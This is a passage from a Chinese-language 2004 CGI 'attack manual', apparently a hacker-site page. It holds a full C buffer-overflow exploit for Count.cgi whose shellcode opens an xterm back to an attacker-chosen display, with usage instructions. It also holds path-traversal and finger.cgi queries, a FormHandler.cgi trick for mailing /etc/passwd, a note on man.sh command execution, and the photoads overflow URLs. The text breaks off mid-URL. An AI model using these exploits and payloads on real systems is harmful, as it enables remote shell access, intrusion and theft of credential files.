网络程序攻击手册
作者:未知 文章来源:CnXHacker.Net 点击数: 更新时间:2004-11-7
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "xebx3cx5ex31xc0x89xf1x8dx5ex18x88x46x2cx88x46x30" "x88x46x39x88x46x4bx8dx56x20x89x16x8dx56x2dx89x56" "x04x8dx56x31x89x56x08x8dx56x3ax89x56x0cx8dx56x10" "x89x46x10xb0x0bxcdx80x31xdbx89xd8x40xcdx80xe8xbf" "xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff" "xffxffxffxffxffxffxffxffxffxffxff" "/usr/X11R6/bin/xterm0-ut0-display0"; char endpad[]= "xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff" "xffxffxffxffxffxffxffxffxffxffxff"; int main (int argc, char *argv[]){ char *shellcode = NULL; int cnt,ver,retcount, dispnum,dotquads[4],offset; unsigned long sp; char dispname[255]; char *host; offset = sp = cnt = ver = 0; fprintf(stderr,"t%s - Gusn",argv[0]); if (argc<3) usage(argv[0]); while ((cnt = getopt(argc,argv,"h:d:v:o:")) != EOF) { switch(cnt){ case 'h': host = optarg; break; case 'd': { retcount = sscanf(optarg, "%d.%d.%d.%d:%d", &dotquads[0], &dotquads[1], &dotquads[2], &dotquads[3], &dispnum); if (retcount != 5) usage(argv[0]); sprintf(dispname, "%03d.%03d.%03d.%03d:%01d", dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum); shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad)); sprintf(shellcode,"%s%s%s",shell,dispname,endpad); } break; case 'v': ver = atoi(optarg); break; case 'o': offset = atoi(optarg); break; default: usage(argv[0]); break; } } sp = offset + getsp(ver); (void)doit(host,sp,shellcode); exit(0); } unsigned long getsp(int ver) { /* Get the stack pointer we should be using. YMMV. 
If it does not work, try using -o X, where x is between -1500 and 1500 */ unsigned long sp=0; if (ver == 15) sp = 0xbfffea50; if (ver == 20) sp = 0xbfffea50; if (ver == 22) sp = 0xbfffeab4; if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */ if (sp == 0) { fprintf(stderr,"I don't have an sp for that version try using the -o option.n"); fprintf(stderr,"Versions above 24 are patched for this bug.n"); exit(1); } else { return sp; } } int usage (char *name) { fprintf(stderr,"tUsage:%s -h host -d <display> -v <version> [-o <offset>]n",name); fprintf(stderr,"te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22n",name); exit(1); } int openhost (char *host, int port) { int sock; struct hostent *he; struct sockaddr_in sa; he = gethostbyname(host); if (he == NULL) { perror("Bad hostnamen"); exit(-1); } memcpy(&sa.sin_addr, he->h_addr, he->h_length); sa.sin_port=htons(port); sa.sin_family=AF_INET; sock=socket(AF_INET,SOCK_STREAM,0); if (sock < 0) { perror ("cannot open socket"); exit(-1); } bzero(&sa.sin_zero,sizeof (sa.sin_zero)); if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) { perror("cannot connect to host"); exit(-1); } return(sock); } void doit (char *host,long sp, char *shellcode) { int cnt,sock; char qs[7000]; int bufsize = 16; char buf[bufsize]; char chain[] = "user=a"; bzero(buf); for(cnt=0;cnt<4104;cnt+=4) { qs[cnt+0] = sp & 0x000000ff; qs[cnt+1] = (sp & 0x0000ff00) >> 8; qs[cnt+2] = (sp & 0x00ff0000) >> 16; qs[cnt+3] = (sp & 0xff000000) >> 24; } strcpy(qs,chain); qs[strlen(chain)]=0x90; qs[4104]= sp&0x000000ff; qs[4105]=(sp&0x0000ff00)>>8; qs[4106]=(sp&0x00ff0000)>>16; qs[4107]=(sp&0xff000000)>>24; qs[4108]= sp&0x000000ff; qs[4109]=(sp&0x0000ff00)>>8; qs[4110]=(sp&0x00ff0000)>>16; qs[4111]=(sp&0xff000000)>>24; qs[4112]= sp&0x000000ff; qs[4113]=(sp&0x0000ff00)>>8; qs[4114]=(sp&0x00ff0000)>>16; qs[4115]=(sp&0xff000000)>>24; qs[4116]= sp&0x000000ff; qs[4117]=(sp&0x0000ff00)>>8; qs[4118]=(sp&0x00ff0000)>>16; qs[4119]=(sp&0xff000000)>>24; qs[4120]= sp&0x000000ff; 
qs[4121]=(sp&0x0000ff00)>>8; qs[4122]=(sp&0x00ff0000)>>16; qs[4123]=(sp&0xff000000)>>24; qs[4124]= sp&0x000000ff; qs[4125]=(sp&0x0000ff00)>>8; qs[4126]=(sp&0x00ff0000)>>16; qs[4127]=(sp&0xff000000)>>24; qs[4128]= sp&0x000000ff; qs[4129]=(sp&0x0000ff00)>>8; qs[4130]=(sp&0x00ff0000)>>16; qs[4131]=(sp&0xff000000)>>24; strcpy((char*)&qs[4132],shellcode); sock = openhost(host,80); write(sock,"GET /cgi-bin/Count.cgi?",23); write(sock,qs,strlen(qs)); write(sock," HTTP/1.0n",10); write(sock,"User-Agent: ",12); write(sock,qs,strlen(qs)); write(sock,"nn",2); sleep(1); /* printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0nUser-Agent: %snn",qs,qs); */ /* setenv("HTTP_USER_AGENT",qs,1); setenv("QUERY_STRING",qs,1); system("./Count.cgi"); */ } 用法是:count -h <攻击目标IP> -d <显示> -v <Count.cgi的版本> 例如:count -h www.foo.bar -d 127.0.0.1:0 -v 22 用Count.cgi看图片 http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif 二十三.finger.cgi lynx http://www.victim.com/cgi-bin/finger?@localhost 得到主机上登陆的用户名. 二十四.man.sh Robert Moniotfound followung. The May1998 issueof SysAdmin Magazinecontainsanarticle,"Web-EnabledManPages", which includes source code for very nice cgi script named man.sh to feed man pagesto aweb browser. The hypertextlinks toother man pages are an especially attractive feature. Unfortunately, this script is vulnerable to attack. Essentially, anyone who can execute the cgi thru their web browser can runany system commands with the user id of the web server and obtainthe output from them in a web page. 二十五.FormHandler.cgi 在表格里加上 你的邮箱里就有/etc/passwd 二十六.JFS 相信大家都看过"JFS 侵入 PCWEEK-LINUX 主机的详细过程"这篇文章,他利用photoads 这个CGI模块攻入主机. 我没有实际攻击过,看文章的理解是这样 先lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi? 
AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=% 0a11111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&pa ssword=0&CityStPhone=0&Renewed=0" 创建新AD值绕过 $AdNum 的检查后用 lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi? 
file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 111111111 上一页 [1] [2] [3] [4] [5] [6] 下一页 |